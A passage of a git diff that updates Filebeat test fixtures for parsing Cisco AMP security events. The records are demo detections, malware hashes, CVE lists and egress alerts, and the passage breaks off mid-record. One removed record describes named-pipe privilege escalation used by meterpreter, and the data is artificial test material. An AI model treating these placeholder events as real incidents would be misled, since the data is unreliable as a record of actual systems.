Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json index 7cd87985c4a..c26ba6d9286 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json @@ -420,119 +420,63 @@ ] }, { - "@timestamp": "2021-01-15T10:32:58.000Z", - "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", - "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "27:85:29:21:67:49" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296274, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006657", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "27:85:29:21:67:49" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Cloud IOC", - "event.category": [ - "file" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 1476910664322001000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "event.start": "2021-01-15T10:32:58.000Z", - "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", - "file.name": "cmd.exe", - "file.path": "/C:/WINDOWS/system32/cmd.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", - "host.name": "Demo_Command_Line_Arguments_Meterpreter", - "input.type": "log", - "log.offset": 25799, - "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", - "related.hash": [ - "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" - ], - "related.hosts": [ - "Demo_Command_Line_Arguments_Meterpreter" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:27:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671385032556606", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 25000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671385032557000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 27431, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 18534, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -540,64 +484,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55805, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:27:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671380737589308", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006661", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 605000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671380737589000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 30074, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 19987, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -605,66 +556,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55809, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671123039551547", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006660", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 81000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 931000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671123039551000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 31393, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 21440, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -672,3680 +628,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55808, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:37.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671118744584249", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006659", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 666000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671118744584000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 34036, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670861046546488", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 293000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670861046546000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 35355, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670856751579190", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 880000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670856751579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 38000, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:24:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296258, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 329000000, - "event.action": "Multiple Infected Files", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900329000200, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:24:58.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 39319, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:23:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670191031648309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670191031648000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 40618, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "event.action": "Executed malware", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 15212386047828, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:22:29.000Z", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "file:///C%3A/ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": 